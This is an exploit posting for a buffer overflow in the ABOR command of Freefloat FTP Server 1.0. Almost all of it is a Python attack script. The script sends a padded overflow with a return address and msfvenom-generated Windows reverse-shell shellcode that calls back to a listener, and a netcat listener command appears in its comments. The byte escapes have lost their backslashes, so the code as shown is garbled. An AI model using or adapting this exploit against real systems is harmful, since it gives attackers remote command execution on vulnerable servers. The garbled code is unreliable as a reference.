Freefloat FTP Server 1.0 ABOR Buffer Overflow
Posted on 02 November 2016
#!/usr/bin/env python #-*- coding: utf-8 -*- # Exploit Title: FreeFloat FTP Server BoF ABOR Command # Date: 29/10/2016 # Exploit Author: Ger # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip # Version: 1.0 # Tested on: Windows XP Profesional V. 2002 Service Pack 3 # CVE : n/a import socket #shellcode with metasploit #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.74.132 LPORT=443 -b 'x00x0dx0a' -f c #nc -lvp 443 #send the exploit ret='x73x18x6Ex74' #MSCTF.dll shellcode=("xddxc6xd9x74x24xf4x5dxb8x2axb4x5ax74x29xc9xb1" "x52x31x45x17x03x45x17x83xefxb0xb8x81x13x50xbe" "x6axebxa1xdfxe3x0ex90xdfx90x5bx83xefxd3x09x28" "x9bxb6xb9xbbxe9x1excex0cx47x79xe1x8dxf4xb9x60" "x0ex07xeex42x2fxc8xe3x83x68x35x09xd1x21x31xbc" "xc5x46x0fx7dx6ex14x81x05x93xedxa0x24x02x65xfb" "xe6xa5xaax77xafxbdxafxb2x79x36x1bx48x78x9ex55" "xb1xd7xdfx59x40x29x18x5dxbbx5cx50x9dx46x67xa7" "xdfx9cxe2x33x47x56x54x9fx79xbbx03x54x75x70x47" "x32x9ax87x84x49xa6x0cx2bx9dx2ex56x08x39x6ax0c" "x31x18xd6xe3x4ex7axb9x5cxebxf1x54x88x86x58x31" "x7dxabx62xc1xe9xbcx11xf3xb6x16xbdxbfx3fxb1x3a" "xbfx15x05xd4x3ex96x76xfdx84xc2x26x95x2dx6bxad" "x65xd1xbex62x35x7dx11xc3xe5x3dxc1xabxefxb1x3e" "xcbx10x18x57x66xebxcbx98xdfxb9x8fx71x22x3dx91" "x3axabxdbxfbx2cxfax74x94xd5xa7x0ex05x19x72x6b" "x05x91x71x8cxc8x52xffx9exbdx92x4axfcx68xacx60" "x68xf6x3fxefx68x71x5cxb8x3fxd6x92xb1xd5xcax8d" "x6bxcbx16x4bx53x4fxcdxa8x5ax4ex80x95x78x40x5c" "x15xc5x34x30x40x93xe2xf6x3ax55x5cxa1x91x3fx08" "x34xdaxffx4ex39x37x76xaex88xeexcfxd1x25x67xd8" "xaax5bx17x27x61xd8x27x62x2bx49xa0x2bxbexcbxad" "xcbx15x0fxc8x4fx9fxf0x2fx4fxeaxf5x74xd7x07x84" "xe5xb2x27x3bx05x97") buffer='x90'*20 + shellcode buffer1='x41'*247 + ret + buffer + 'x43'*(696-len(buffer)) print "Sending Buffer" s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('192.168.74.133', 21)) s.recv(1024) s.send('USER anonymous ') s.recv(1024) s.send('PASS anonymous ') s.recv(1024) s.send('ABOR' + buffer1 + ' ') s.close()
